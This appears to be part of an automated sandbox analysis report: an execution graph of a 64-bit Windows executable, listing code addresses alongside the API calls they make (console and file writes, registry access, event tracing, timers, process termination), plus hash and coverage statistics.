                                                                                                                                                                                              • API ID: Heap$AllocProcessmemcpy
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 4164033339-0
                                                                                                                                                                                              • Opcode ID: 27d990295899a2b8ebf7f0e9744a37e411a4e5368bcdd4215ea8016d0dded8a4
                                                                                                                                                                                              • Instruction ID: 5eaca808e6ad7bec68c703087605b7ef5fdf3e0b654efb30368d496661851a26
                                                                                                                                                                                              • Opcode Fuzzy Hash: 27d990295899a2b8ebf7f0e9744a37e411a4e5368bcdd4215ea8016d0dded8a4
                                                                                                                                                                                              • Instruction Fuzzy Hash: 5511E226F0974681EB54AB269805139E760FB85FE0FA88234CE5E537E4DE7CF441C310

                                                                                                                                                                                              Execution Graph

                                                                                                                                                                                              Execution Coverage:4.2%
                                                                                                                                                                                              Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                              Signature Coverage:2.4%
                                                                                                                                                                                              Total number of Nodes:1850
                                                                                                                                                                                              Total number of Limit Nodes:85
                                                                                                                                                                                              execution_graph 32170 7ff780fcf764 32171 7ff780fcf793 32170->32171 32172 7ff780fcf841 32171->32172 32180 7ff7810a4540 32171->32180 32176 7ff780fcf7d5 32176->32172 32178 7ff7810a458c free numpunct 32176->32178 32179 7ff780fcf835 32176->32179 32178->32176 32188 7ff7810a458c 32179->32188 32181 7ff7810a455a malloc 32180->32181 32182 7ff780fcf7b7 32181->32182 32183 7ff7810a454b 32181->32183 32187 7ff780fd02b0 7 API calls 32182->32187 32183->32181 32184 7ff7810a456a 32183->32184 32190 7ff780f91ac4 ??0exception@@QEAA@AEBQEBDH 32184->32190 32186 7ff7810a4574 32187->32176 32188->32172 32189 7ff7810a5e43 free 32188->32189 32190->32186 32191 7ff780f92680 32192 7ff780f926a0 free 32191->32192 32193 7ff780f926b2 32191->32193 32194 7ff780f926bd 32192->32194 32193->32194 32195 7ff7810a458c numpunct free 32193->32195 32196 7ff780f926d5 32194->32196 32197 7ff7810a458c numpunct free 32194->32197 32195->32194 32197->32196 32198 7ff780f9aec1 32242 7ff78101a42c NtDeviceIoControlFile 32198->32242 32201 7ff780f9aed5 32203 7ff780fce3ac 23 API calls 32201->32203 32202 7ff780f9aefc NtClose 32204 7ff780f9af19 32202->32204 32205 7ff780f9aeec RtlNtStatusToDosError 32203->32205 32206 7ff780f9af50 32204->32206 32207 7ff780f9af1d GetLastError 32204->32207 32205->32204 32245 7ff780fce3ac 32206->32245 32267 7ff780fa9820 LoadLibraryExW FormatMessageW GetStringTypeExW FreeLibrary 32207->32267 32209 7ff780f9af35 32211 7ff780fce3ac 23 API calls 32209->32211 32212 7ff780f9af4e 32211->32212 32213 7ff780f9af97 32212->32213 32268 7ff780f9ac6c 27 API calls 32212->32268 32214 7ff780f9afa4 LoadLibraryW 32213->32214 32215 7ff780f9b0c9 32213->32215 32217 7ff780f9afc0 GetProcAddress 32214->32217 32298 7ff780fcf510 32215->32298 32222 7ff780f9afdd 32217->32222 32223 7ff780f9b107 _CxxThrowException _CxxThrowException 32222->32223 32224 7ff780f9b0b5 32222->32224 32225 7ff780f9b005 32222->32225 32226 7ff780f9b13c 32223->32226 32227 7ff780fce3ac 23 API calls 32224->32227 32228 7ff780fce3ac 23 API calls 32225->32228 32315 7ff780fa9210 32226->32315 32227->32215 32230 7ff780f9b019 32228->32230 32230->32215 32232 7ff780f9b0f0 _CxxThrowException 32230->32232 32233 7ff780f9b036 32230->32233 32232->32223 32269 7ff780fa9c0c 32233->32269 32235 7ff780f9b2ce _CxxThrowException 32243 7ff7810a5990 7 API calls 32242->32243 32244 7ff780f9aec8 32243->32244 32244->32201 32244->32202 32246 7ff780fce653 32245->32246 32247 7ff780fce401 32245->32247 32323 7ff7810a5a24 AcquireSRWLockExclusive SleepConditionVariableSRW ReleaseSRWLockExclusive 32246->32323 32249 7ff780fce635 32247->32249 32250 7ff780fce411 EventEnabled 32247->32250 32251 7ff7810a5990 7 API calls 32249->32251 32253 7ff780fce440 GetCurrentProcessId 32250->32253 32254 7ff780fce438 32250->32254 32255 7ff780fce644 32251->32255 32320 7ff780fa9854 32253->32320 32254->32249 32254->32253 32255->32212 32259 7ff780fce4a0 _vsnprintf_s 32259->32249 32260 7ff780fce4f2 EventEnabled 32259->32260 32261 7ff780fce5b7 32260->32261 32263 7ff780fce51d 32260->32263 32261->32249 32262 7ff780fce5dd EnterCriticalSection 32261->32262 32264 7ff780fce622 LeaveCriticalSection 32262->32264 32265 7ff780fce5fd WriteFile 32262->32265 32263->32249 32263->32261 32322 7ff780f95c78 EventWriteTransfer 32263->32322 32264->32249 32265->32264 32267->32209 32268->32213 32270 7ff780fa9c43 32269->32270 32324 7ff780fa26d4 32270->32324 32272 7ff780fa9de6 __uncaught_exception 32273 7ff780fa9def 32272->32273 32274 7ff780fa9df9 32272->32274 32340 7ff780fa52a0 36 API calls 32273->32340 32278 7ff780f9b049 32274->32278 32341 7ff7810a48b8 LeaveCriticalSection 32274->32341 32281 7ff780fa2944 32278->32281 32282 7ff780fa26d4 36 API calls 32281->32282 32284 7ff780fa2973 32282->32284 32283 7ff780fa2a2b __uncaught_exception 32286 7ff780fa2a3e 32283->32286 32287 7ff780fa2a34 32283->32287 32284->32283 32285 7ff780f92c78 24 API calls 32284->32285 32288 7ff780fa2a2a 32285->32288 32290 7ff780f9b054 32286->32290 32345 7ff7810a48b8 LeaveCriticalSection 32286->32345 32344 7ff780fa52a0 36 API calls 32287->32344 32288->32283 32292 7ff780fa28c4 32290->32292 32293 7ff780fa28fb 32292->32293 32294 7ff780fa28e9 32292->32294 32295 7ff780f9b05c 32293->32295 32296 7ff780f92c78 24 API calls 32293->32296 32346 7ff780fa1450 32294->32346 32295->32215 32296->32295 32299 7ff780fcf594 32298->32299 32300 7ff780fcf532 32298->32300 32301 7ff780fce3ac 23 API calls 32299->32301 32300->32299 32302 7ff780fcf544 32300->32302 32303 7ff780fcf592 32301->32303 32302->32303 32390 7ff780f95c78 EventWriteTransfer 32302->32390 32305 7ff7810a5990 7 API calls 32303->32305 32306 7ff780f9b0ce 32305->32306 32307 7ff7810a5990 32306->32307 32308 7ff7810a5999 32307->32308 32309 7ff780f9b0de 32308->32309 32310 7ff7810a5ae0 RtlCaptureContext RtlLookupFunctionEntry 32308->32310 32311 7ff7810a5b25 RtlVirtualUnwind 32310->32311 32312 7ff7810a5b67 32310->32312 32311->32312 32391 7ff7810a5aa4 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 32312->32391 32392 7ff780fab16c 32315->32392 32318 7ff780f9b172 _CxxThrowException 32318->32235 32321 7ff780fa9862 GetTickCount _snprintf_s 32320->32321 32321->32249 32321->32259 32322->32261 32325 7ff780fa2706 32324->32325 32326 7ff780fa272c 32325->32326 32327 7ff780fa28c4 36 API calls 32325->32327 32326->32272 32328 7ff780f92c78 32326->32328 32327->32326 32329 7ff780f92ca9 32328->32329 32330 7ff780f92cbc 32328->32330 32329->32330 32331 7ff780f92d28 _CxxThrowException 32329->32331 32332 7ff7810a5990 7 API calls 32330->32332 32342 7ff780fa2888 14 API calls numpunct 32331->32342 32334 7ff780f92cc8 32332->32334 32334->32272 32335 7ff780f92d3e 32343 7ff780f92bbc 15 API calls std::bad_exception::bad_exception 32335->32343 32337 7ff780f92d4c _CxxThrowException 32338 7ff780f92d64 32337->32338 32339 7ff780f92c78 22 API calls 32338->32339 32340->32274 32342->32335 32343->32337 32344->32286 32347 7ff780fa146a 32346->32347 32348 7ff780fa1466 32346->32348 32350 7ff780fa3f38 32347->32350 32348->32293 32351 7ff780fa3f77 32350->32351 32361 7ff780fa3f70 32350->32361 32372 7ff780fa5a6c 32351->32372 32353 7ff780fa41dd 32355 7ff780fa4235 32353->32355 32356 7ff780fa4218 32353->32356 32357 7ff780fa423e memmove 32355->32357 32355->32361 32382 7ff780fa4294 memmove free numpunct 32356->32382 32357->32361 32360 7ff780fa4137 32362 7ff780fa414f WriteConsoleW 32360->32362 32363 7ff780fa4168 WriteFile 32360->32363 32361->32348 32369 7ff780fa3fa6 32362->32369 32363->32369 32364 7ff780fa3fe9 WideCharToMultiByte 32364->32369 32365 7ff780fa4032 GetLastError 32368 7ff780fa4047 WideCharToMultiByte 32365->32368 32365->32369 32366 7ff780fa4127 WriteFile 32366->32369 32367 7ff780fa4119 WriteConsoleA 32367->32369 32368->32369 32369->32353 32369->32360 32369->32364 32369->32365 32369->32366 32369->32367 32370 7ff7810a458c numpunct free 32369->32370 32371 7ff780fa40bc SetLastError Sleep 32369->32371 32370->32369 32371->32369 32383 7ff780fdd354 32372->32383 32375 7ff780fa3f7c 32375->32369 32381 7ff780fa5b74 memmove free 32375->32381 32376 7ff780fdd354 ldiv 32377 7ff780fa5a9f 32376->32377 32377->32375 32386 7ff780fdd310 ldiv 32377->32386 32379 7ff780fa5ab8 32379->32375 32387 7ff780fa4294 memmove free numpunct 32379->32387 32381->32369 32382->32361 32388 7ff780fdd398 ldiv 32383->32388 32386->32379 32387->32375 32389 7ff780fa5a86 32388->32389 32389->32375 32389->32376 32390->32303 32393 7ff780fa9232 32392->32393 32394 7ff780fab1a2 32392->32394 32393->32318 32409 7ff780fa8338 38 API calls std::bad_exception::bad_exception 32393->32409 32394->32393 32395 7ff780fab550 _CxxThrowException 32394->32395 32397 7ff780fab1dc 32394->32397 32396 7ff780fab1e1 GetStringTypeExW 32396->32397 32397->32396 32399 7ff780fab222 32397->32399 32398 7ff780fab233 GetStringTypeExW 32398->32399 32399->32393 32399->32398 32406 7ff780fab278 32399->32406 32400 7ff780fab2ad GetStringTypeExW 32400->32406 32402 7ff780fab2f9 GetStringTypeExW 32402->32406 32403 7ff780fab383 GetStringTypeExW 32403->32406 32404 7ff780fab3f2 CompareStringW 32404->32406 32405 7ff780fab42e GetStringTypeExW 32405->32406 32406->32393 32406->32400 32406->32402 32406->32403 32406->32404 32406->32405 32407 7ff780fab474 GetStringTypeExW 32406->32407 32408 7ff780fab4bd GetStringTypeExW 32406->32408 32410 7ff780fac22c 27 API calls std::bad_exception::bad_exception 32406->32410 32407->32406 32408->32406 32409->32318 32410->32406 32411 7ff780fa0497 32412 7ff780fa04a4 32411->32412 32466 7ff780fcf3b4 32412->32466 32415 7ff780fa0516 32479 7ff780fca818 32415->32479 32417 7ff780fa0af1 _CxxThrowException 32420 7ff780fa0b0d _CxxThrowException 32417->32420 32423 7ff780fa0b51 32420->32423 32424 7ff780fa0b41 FreeLibrary 32420->32424 32421 7ff780fa0531 GetLastError 32675 7ff780fa9820 LoadLibraryExW FormatMessageW GetStringTypeExW FreeLibrary 32421->32675 32422 7ff780fa0583 32426 7ff780fa0591 32422->32426 32676 7ff780f9a698 27 API calls 32422->32676 32424->32423 32432 7ff780fa059f 32426->32432 32624 7ff78100b75c 32426->32624 32427 7ff780fa054c 32427->32420 32430 7ff780fa9c0c 38 API calls 32427->32430 32433 7ff780fa0570 32430->32433 32435 7ff780fa05c8 RemoveDirectoryW 32432->32435 32436 7ff780fa05bc CoUninitialize 32432->32436 32437 7ff780fa2944 38 API calls 32433->32437 32442 7ff780fa05e6 32435->32442 32436->32435 32439 7ff780fa057b 32437->32439 32440 7ff780fa28c4 36 API calls 32439->32440 32440->32422 32443 7ff780fa0671 ReleaseMutex CloseHandle 32442->32443 32444 7ff780fa0697 32442->32444 32443->32444 32445 7ff780fa06e3 32444->32445 32677 7ff780f95c78 EventWriteTransfer 32444->32677 32650 7ff780fd5424 32445->32650 32449 7ff780fcf510 23 API calls 32450 7ff780fa06ed 32449->32450 32451 7ff780fce3ac 23 API calls 32450->32451 32452 7ff780fa0704 32451->32452 32678 7ff780fce2f8 34 API calls 32452->32678 32467 7ff780fcf445 32466->32467 32468 7ff780fcf3f3 32466->32468 32470 7ff780fcf485 32467->32470 32471 7ff780fcf468 32467->32471 32468->32467 32679 7ff780f95c78 EventWriteTransfer 32468->32679 32474 7ff780fcf4a0 32470->32474 32680 7ff780fccfb0 8 API calls 32470->32680 32472 7ff780fce3ac 23 API calls 32471->32472 32475 7ff780fcf483 32472->32475 32474->32475 32681 7ff780fcfaa8 21 API calls 2 library calls 32474->32681 32477 7ff7810a5990 7 API calls 32475->32477 32478 7ff780fa04b5 32477->32478 32478->32415 32478->32417 32665 7ff780fa8a40 32478->32665 32682 7ff780fa80d4 32479->32682 32482 7ff780fa80d4 6 API calls 32483 7ff780fca84d 32482->32483 32485 7ff780fca861 32483->32485 32486 7ff780fca94c 32483->32486 32518 7ff780fca965 32483->32518 32484 7ff780fcabdc 32789 7ff780fcafc0 37 API calls 32484->32789 32487 7ff780fca923 32485->32487 32488 7ff780fca86b 32485->32488 32782 7ff780fcafc0 37 API calls 32486->32782 32780 7ff780fcafc0 37 API calls 32487->32780 32493 7ff780fca874 32488->32493 32494 7ff780fca90a 32488->32494 32490 7ff780fcabc0 32788 7ff780fcafc0 37 API calls 32490->32788 32492 7ff780fca8a1 32781 7ff780fcafc0 37 API calls 32492->32781 32499 7ff780fca8f6 32493->32499 32500 7ff780fca879 32493->32500 32779 7ff780fcafc0 37 API calls 32494->32779 32495 7ff780fcabf8 32790 7ff780fcafc0 37 API calls 32495->32790 32496 7ff780fcab88 32787 7ff780fcafc0 37 API calls 32496->32787 32778 7ff780fcafc0 37 API calls 32499->32778 32506 7ff780fca8dd 32500->32506 32507 7ff780fca87e 32500->32507 32502 7ff780fcab10 32509 7ff780fcab92 32502->32509 32530 7ff780fcab26 32502->32530 32777 7ff780fcafc0 37 API calls 32506->32777 32513 7ff780fca883 32507->32513 32514 7ff780fca8c4 32507->32514 32508 7ff780fcaaf4 32785 7ff780fcafc0 37 API calls 32508->32785 32786 7ff780fcafc0 37 API calls 32509->32786 32520 7ff780fca8ab 32513->32520 32521 7ff780fca888 32513->32521 32776 7ff780fcafc0 37 API calls 32514->32776 32517 7ff780fcaad8 32784 7ff780fcafc0 37 API calls 32517->32784 32518->32484 32518->32490 32518->32496 32518->32502 32518->32508 32518->32517 32522 7ff780fce3ac 23 API calls 32518->32522 32519 7ff780fcab60 32519->32496 32526 7ff780fa7e24 free 32519->32526 32775 7ff780fcafc0 37 API calls 32520->32775 32521->32518 32527 7ff780fca891 32521->32527 32529 7ff780fca9b8 32522->32529 32532 7ff780fcab80 32526->32532 32774 7ff780fcafc0 37 API calls 32527->32774 32528 7ff780fa8d78 36 API calls 32542 7ff780fcac24 32528->32542 32534 7ff780fcaac6 32529->32534 32540 7ff780fca9d8 32529->32540 32530->32519 32535 7ff780fcab58 32530->32535 32538 7ff7810a458c numpunct free 32530->32538 32536 7ff7810a458c numpunct free 32532->32536 32783 7ff780fcafc0 37 API calls 32534->32783 32539 7ff7810a458c numpunct free 32535->32539 32536->32496 32538->32535 32539->32519 32551 7ff780fcaa0a 32540->32551 32556 7ff7810a458c numpunct free 32540->32556 32560 7ff780fcaa12 32540->32560 32541 7ff780fcaf5a 32545 7ff780fce3ac 23 API calls 32541->32545 32542->32541 32543 7ff780fcafa1 _CxxThrowException 32542->32543 32544 7ff780fcac8a 32542->32544 32548 7ff780fa8a40 GetStringTypeExW 32544->32548 32549 7ff780fcaf58 32545->32549 32546 7ff780fcaa66 32547 7ff780fcaa95 32546->32547 32552 7ff780fa7e24 free 32546->32552 32550 7ff780fca947 32547->32550 32555 7ff780fa7e24 free 32547->32555 32554 7ff780fcac8f 32548->32554 32561 7ff780fa7e24 free 32549->32561 32687 7ff780fa8d78 32550->32687 32557 7ff7810a458c numpunct free 32551->32557 32553 7ff780fcaa8d 32552->32553 32559 7ff7810a458c numpunct free 32553->32559 32554->32541 32567 7ff780fcacb1 32554->32567 32562 7ff780fcaab1 32555->32562 32556->32551 32557->32560 32558 7ff780fcaa5e 32564 7ff7810a458c numpunct free 32558->32564 32559->32547 32560->32546 32560->32558 32563 7ff7810a458c numpunct free 32560->32563 32565 7ff780fcaf80 32561->32565 32566 7ff7810a458c numpunct free 32562->32566 32563->32558 32564->32546 32568 7ff780fa7e24 free 32565->32568 32566->32550 32569 7ff780fce3ac 23 API calls 32567->32569 32570 7ff780fa051d SetConsoleCtrlHandler 32568->32570 32571 7ff780fcacc9 32569->32571 32570->32421 32570->32422 32700 7ff780fa8010 32571->32700 32578 7ff780fa8010 7 API calls 32579 7ff780fcad43 32578->32579 32580 7ff780faf844 44 API calls 32579->32580 32581 7ff780fcad5d 32580->32581 32582 7ff780fa80d4 6 API calls 32581->32582 32583 7ff780fcad8b 32582->32583 32584 7ff780fa80d4 6 API calls 32583->32584 32585 7ff780fcad99 32584->32585 32586 7ff780fa7e24 free 32585->32586 32587 7ff780fcada4 32586->32587 32588 7ff780fa8010 7 API calls 32587->32588 32589 7ff780fcadb8 32588->32589 32590 7ff780faf844 44 API calls 32589->32590 32591 7ff780fcadd5 32590->32591 32592 7ff780fa80d4 6 API calls 32591->32592 32593 7ff780fcadfc 32592->32593 32594 7ff780fa80d4 6 API calls 32593->32594 32595 7ff780fcae0a 32594->32595 32596 7ff780fa7e24 free 32595->32596 32597 7ff780fcae18 32596->32597 32598 7ff780fcae3c 32597->32598 32758 7ff780fe08d0 32597->32758 32765 7ff780fe0e34 32598->32765 32602 7ff780fe0e34 7 API calls 32603 7ff780fcae66 32602->32603 32604 7ff780fe08d0 5 API calls 32603->32604 32605 7ff780fcae70 32604->32605 32606 7ff780fcae74 GetLastError 32605->32606 32607 7ff780fcae9f 32605->32607 32791 7ff780fce694 55 API calls numpunct 32606->32791 32609 7ff780fe08d0 5 API calls 32607->32609 32610 7ff780fcaeac 32609->32610 32611 7ff780fcaeb0 GetLastError 32610->32611 32612 7ff780fcaee8 32610->32612 32792 7ff780fce694 55 API calls numpunct 32611->32792 32614 7ff780fe08d0 5 API calls 32612->32614 32615 7ff780fcaef5 32614->32615 32616 7ff780fcaf31 32615->32616 32617 7ff780fcaef9 GetLastError 32615->32617 32794 7ff780fe0c40 6 API calls 32616->32794 32793 7ff780fce694 55 API calls numpunct 32617->32793 32625 7ff78100b783 32624->32625 32626 7ff78100b815 GetTickCount 32624->32626 32625->32626 32628 7ff78100b790 GetModuleHandleW 32625->32628 32627 7ff78100b850 32626->32627 32629 7ff78100b85c 32627->32629 32630 7ff78100b82e Sleep GetTickCount 32627->32630 32863 7ff780fa7e60 29 API calls numpunct 32628->32863 32633 7ff78100b8d4 32629->32633 32865 7ff78100b4d0 49 API calls 32629->32865 32630->32627 32632 7ff78100b8ef 32630->32632 32632->32633 32633->32432 32634 7ff78100b7cf 32864 7ff780fa9e40 38 API calls 32634->32864 32637 7ff78100b7e8 32638 7ff780fa9c0c 38 API calls 32637->32638 32639 7ff78100b7f7 32638->32639 32643 7ff780fa2944 38 API calls 32639->32643 32640 7ff78100b8bc FreeLibrary 32641 7ff78100b8cf 32640->32641 32866 7ff781018b90 IsWindow DestroyWindow GetModuleHandleW UnregisterClassW 32641->32866 32642 7ff78100b870 32642->32640 32642->32641 32645 7ff78100b8a9 32642->32645 32644 7ff78100b802 32643->32644 32647 7ff780fa28c4 36 API calls 32644->32647 32645->32642 32648 7ff78100b80a 32647->32648 32649 7ff780fa7e24 free 32648->32649 32649->32626 32651 7ff780fa06e8 32650->32651 32652 7ff780fd5438 CancelWaitableTimer CancelWaitableTimer CancelWaitableTimer SetEvent WaitForSingleObject 32650->32652 32651->32449 32653 7ff780fd54a5 32652->32653 32654 7ff780fd54db 32652->32654 32867 7ff780fcedc4 36 API calls numpunct 32653->32867 32656 7ff780fd5519 32654->32656 32868 7ff780fcedc4 36 API calls numpunct 32654->32868 32657 7ff780fd5565 CloseHandle CloseHandle CloseHandle CloseHandle 32656->32657 32658 7ff780fd551e GetLastError 32656->32658 32662 7ff780fce3ac 23 API calls 32657->32662 32869 7ff780fce694 55 API calls numpunct 32658->32869 32659 7ff780fd54bd GetCurrentProcess TerminateProcess 32659->32654 32662->32651 32663 7ff780fd54f9 GetCurrentProcess TerminateProcess 32663->32656 32664 7ff780fd5545 GetCurrentProcess TerminateProcess 32664->32657 32667 7ff780fa04d3 32665->32667 32668 7ff780fa8a58 32665->32668 32666 7ff780fa8a65 GetStringTypeExW 32666->32668 32667->32415 32669 7ff780fdb218 RegOpenKeyExW 32667->32669 32668->32666 32668->32667 32670 7ff780fdb26e RegQueryValueExW 32669->32670 32673 7ff780fdb2af 32669->32673 32670->32673 32671 7ff780fdb2eb RegCloseKey 32672 7ff780fa0506 32671->32672 32672->32415 32674 7ff780fdb318 RegOpenKeyExW RegSetValueExW RegCloseKey 32672->32674 32673->32671 32673->32672 32674->32415 32675->32427 32676->32426 32677->32445 32679->32467 32680->32474 32681->32475 32683 7ff7810a4540 numpunct 2 API calls 32682->32683 32684 7ff780fa80f9 32683->32684 32686 7ff780fa812c 32684->32686 32795 7ff780fac6d0 6 API calls numpunct 32684->32795 32686->32482 32688 7ff780fa8d99 32687->32688 32689 7ff780fa8ece 32687->32689 32796 7ff780fa9630 32688->32796 32689->32528 32692 7ff780fa8ddb 32697 7ff780fa8df8 32692->32697 32806 7ff780fabdc8 GetStringTypeExW GetStringTypeExW 32692->32806 32693 7ff780fa8e00 32693->32689 32808 7ff780fa8810 32693->32808 32695 7ff780fa8e25 GetStringTypeExW 32695->32697 32697->32693 32697->32695 32807 7ff780fabdc8 GetStringTypeExW GetStringTypeExW 32697->32807 32699 7ff780fa8e80 memmove 32699->32693 32699->32697 32701 7ff7810a4540 numpunct 2 API calls 32700->32701 32703 7ff780fa8039 32701->32703 32702 7ff780fa80a1 32707 7ff780faf844 32702->32707 32703->32702 32705 7ff780fa8083 32703->32705 32706 7ff780fa80ba _CxxThrowException 32703->32706 32849 7ff780fac6d0 6 API calls numpunct 32705->32849 32708 7ff780fa80d4 6 API calls 32707->32708 32709 7ff780faf881 32708->32709 32710 7ff780fa80d4 6 API calls 32709->32710 32711 7ff780faf88b 32710->32711 32712 7ff780fa80d4 6 API calls 32711->32712 32713 7ff780faf8b9 32712->32713 32714 7ff780fa9630 7 API calls 32713->32714 32715 7ff780faf8d6 32714->32715 32716 7ff780faf8f7 32715->32716 32850 7ff780fa8338 38 API calls std::bad_exception::bad_exception 32715->32850 32718 7ff780faf915 32716->32718 32719 7ff780faf946 32716->32719 32722 7ff780fa8410 29 API calls 32718->32722 32720 7ff780faf9cb 32719->32720 32721 7ff780faf94c 32719->32721 32724 7ff780fa80d4 6 API calls 32720->32724 32853 7ff780fa8978 30 API calls std::bad_exception::bad_exception 32721->32853 32725 7ff780faf91d 32722->32725 32726 7ff780faf9d4 32724->32726 32851 7ff780fa8978 30 API calls std::bad_exception::bad_exception 32725->32851 32856 7ff780f93a1c 42 API calls numpunct 32726->32856 32728 7ff780faf990 32732 7ff780fa7e24 free 32728->32732 32730 7ff780faf937 32852 7ff780f93a1c 42 API calls numpunct 32730->32852 32731 7ff780faf9e0 32735 7ff780fa7e24 free 32731->32735 32736 7ff780faf9a0 32732->32736 32734 7ff780faf943 32741 7ff780fa7e24 free 32734->32741 32747 7ff780faf9ea 32735->32747 32854 7ff780fa8978 30 API calls std::bad_exception::bad_exception 32736->32854 32737 7ff780faf960 32737->32728 32738 7ff780faf988 32737->32738 32742 7ff7810a458c numpunct free 32737->32742 32743 7ff7810a458c numpunct free 32738->32743 32740 7ff780faf9b3 32855 7ff780f93a1c 42 API calls numpunct 32740->32855 32744 7ff780faf9c9 32741->32744 32742->32738 32743->32728 32746 7ff780fa7e24 free 32744->32746 32749 7ff780fafa2b 32746->32749 32747->32744 32748 7ff780fafa13 32747->32748 32750 7ff7810a458c numpunct free 32747->32750 32751 7ff7810a458c numpunct free 32748->32751 32752 7ff780fa7e24 32749->32752 32750->32748 32751->32744 32753 7ff780fa7e52 32752->32753 32754 7ff780fa7e34 32752->32754 32753->32578 32754->32753 32755 7ff780fa7e4a 32754->32755 32757 7ff7810a458c numpunct free 32754->32757 32756 7ff7810a458c numpunct free 32755->32756 32756->32753 32757->32755 32857 7ff780fe07b4 RegCreateKeyExW SetLastError 32758->32857 32761 7ff780fe0940 32761->32598 32762 7ff780fe0900 GetLastError 32763 7ff780fe0932 SetLastError 32762->32763 32764 7ff780fe0921 RegCloseKey 32762->32764 32763->32761 32764->32763 32859 7ff780fac4b0 32765->32859 32768 7ff780fcae51 32768->32602 32769 7ff780fe0ea2 32770 7ff780fe08d0 5 API calls 32769->32770 32770->32768 32771 7ff780fe0e9a 32773 7ff7810a458c numpunct free 32771->32773 32772 7ff7810a458c numpunct free 32772->32771 32773->32769 32774->32492 32775->32492 32776->32492 32777->32492 32778->32492 32779->32492 32780->32492 32781->32550 32782->32492 32783->32517 32784->32508 32785->32502 32786->32496 32787->32490 32788->32484 32789->32495 32790->32550 32791->32607 32792->32612 32793->32616 32795->32686 32797 7ff780fa9656 32796->32797 32798 7ff780fa8d9e GetStringTypeExW 32796->32798 32799 7ff7810a4540 numpunct 2 API calls 32797->32799 32798->32692 32800 7ff780fa9660 32799->32800 32801 7ff780fa9699 32800->32801 32830 7ff780fac6d0 6 API calls numpunct 32800->32830 32801->32798 32803 7ff780fa96bd 32801->32803 32804 7ff7810a458c numpunct free 32801->32804 32805 7ff7810a458c numpunct free 32803->32805 32804->32803 32805->32798 32806->32697 32807->32699 32809 7ff780fa8850 32808->32809 32810 7ff780fa8937 32808->32810 32812 7ff780fa8862 32809->32812 32813 7ff780fa8858 32809->32813 32845 7ff780f930f0 25 API calls numpunct 32810->32845 32816 7ff7810a4540 numpunct 2 API calls 32812->32816 32825 7ff780fa88e5 32812->32825 32831 7ff780fa8410 32813->32831 32814 7ff780fa8951 32846 7ff780f91e60 14 API calls std::bad_exception::bad_exception 32814->32846 32820 7ff780fa888f 32816->32820 32818 7ff780fa885d 32822 7ff7810a5990 7 API calls 32818->32822 32826 7ff780fa88b5 32820->32826 32843 7ff780fabf80 29 API calls std::bad_exception::bad_exception 32820->32843 32821 7ff780fa895f _CxxThrowException 32824 7ff780fa891f 32822->32824 32824->32689 32844 7ff780faa8b0 26 API calls std::bad_exception::bad_exception 32825->32844 32826->32825 32827 7ff780fa88dd 32826->32827 32828 7ff7810a458c numpunct free 32826->32828 32829 7ff7810a458c numpunct free 32827->32829 32828->32827 32829->32825 32830->32801 32832 7ff780fa8436 32831->32832 32833 7ff780fa84a4 32831->32833 32835 7ff7810a4540 numpunct 2 API calls 32832->32835 32848 7ff780faa8b0 26 API calls std::bad_exception::bad_exception 32833->32848 32837 7ff780fa8440 32835->32837 32836 7ff780fa849f 32836->32818 32839 7ff780fa8473 32837->32839 32847 7ff780fac6d0 6 API calls numpunct 32837->32847 32839->32836 32840 7ff780fa8497 32839->32840 32841 7ff7810a458c numpunct free 32839->32841 32842 7ff7810a458c numpunct free 32840->32842 32841->32840 32842->32836 32843->32826 32844->32818 32845->32814 32846->32821 32847->32839 32848->32836 32849->32702 32850->32716 32851->32730 32852->32734 32853->32737 32854->32740 32855->32734 32856->32731 32858 7ff780fe0814 32857->32858 32858->32761 32858->32762 32860 7ff780fac51d 32859->32860 32861 7ff780fac4d3 32859->32861 32860->32768 32860->32769 32860->32771 32860->32772 32861->32860 32862 7ff780fac50a CompareStringW 32861->32862 32862->32860 32863->32634 32864->32637 32865->32642 32866->32633 32867->32659 32868->32663 32869->32664 32870 7ff780f9eb1e 32871 7ff780f9eb26 SetLastError 32870->32871 32872 7ff780f9eb51 32871->32872 32873 7ff780f9eb56 FreeLibrary 32872->32873 32874 7ff780f9eb65 32872->32874 32873->32874 32932 7ff780fdcdb8 GetConsoleOutputCP 32874->32932 32877 7ff780fce3ac 23 API calls 32878 7ff780f9eb8e 32877->32878 32879 7ff780fcf3b4 44 API calls 32878->32879 32880 7ff780fa04b5 32879->32880 32881 7ff780fa0516 32880->32881 32883 7ff780fa0af1 _CxxThrowException 32880->32883 32885 7ff780fa8a40 GetStringTypeExW 32880->32885 32882 7ff780fca818 104 API calls 32881->32882 32884 7ff780fa051d SetConsoleCtrlHandler 32882->32884 32886 7ff780fa0b0d _CxxThrowException 32883->32886 32887 7ff780fa0531 GetLastError 32884->32887 32888 7ff780fa0583 32884->32888 32897 7ff780fa04d3 32885->32897 32889 7ff780fa0b51 32886->32889 32890 7ff780fa0b41 FreeLibrary 32886->32890 32971 7ff780fa9820 LoadLibraryExW FormatMessageW GetStringTypeExW FreeLibrary 32887->32971 32892 7ff780fa0591 32888->32892 32972 7ff780f9a698 27 API calls 32888->32972 32890->32889 32895 7ff78100b75c 58 API calls 32892->32895 32898 7ff780fa059f 32892->32898 32893 7ff780fa054c 32893->32886 32896 7ff780fa9c0c 38 API calls 32893->32896 32895->32898 32899 7ff780fa0570 32896->32899 32897->32881 32900 7ff780fdb218 3 API calls 32897->32900 32901 7ff780fa05c8 RemoveDirectoryW 32898->32901 32902 7ff780fa05bc CoUninitialize 32898->32902 32903 7ff780fa2944 38 API calls 32899->32903 32904 7ff780fa0506 32900->32904 32908 7ff780fa05e6 32901->32908 32902->32901 32905 7ff780fa057b 32903->32905 32904->32881 32970 7ff780fdb318 RegOpenKeyExW RegSetValueExW RegCloseKey 32904->32970 32906 7ff780fa28c4 36 API calls 32905->32906 32906->32888 32909 7ff780fa0671 ReleaseMutex CloseHandle 32908->32909 32910 7ff780fa0697 32908->32910 32909->32910 32911 7ff780fa06e3 32910->32911 32973 7ff780f95c78 EventWriteTransfer 32910->32973 32913 7ff780fd5424 76 API calls 32911->32913 32914 7ff780fa06e8 32913->32914 32915 7ff780fcf510 23 API calls 32914->32915 32916 7ff780fa06ed 32915->32916 32917 7ff780fce3ac 23 API calls 32916->32917 32918 7ff780fa0704 32917->32918 32974 7ff780fce2f8 34 API calls 32918->32974 32933 7ff780fdd12d _CxxThrowException 32932->32933 32934 7ff780fdcdf9 32932->32934 32975 7ff780fa595c 32934->32975 32936 7ff780fdce03 32937 7ff780fdd117 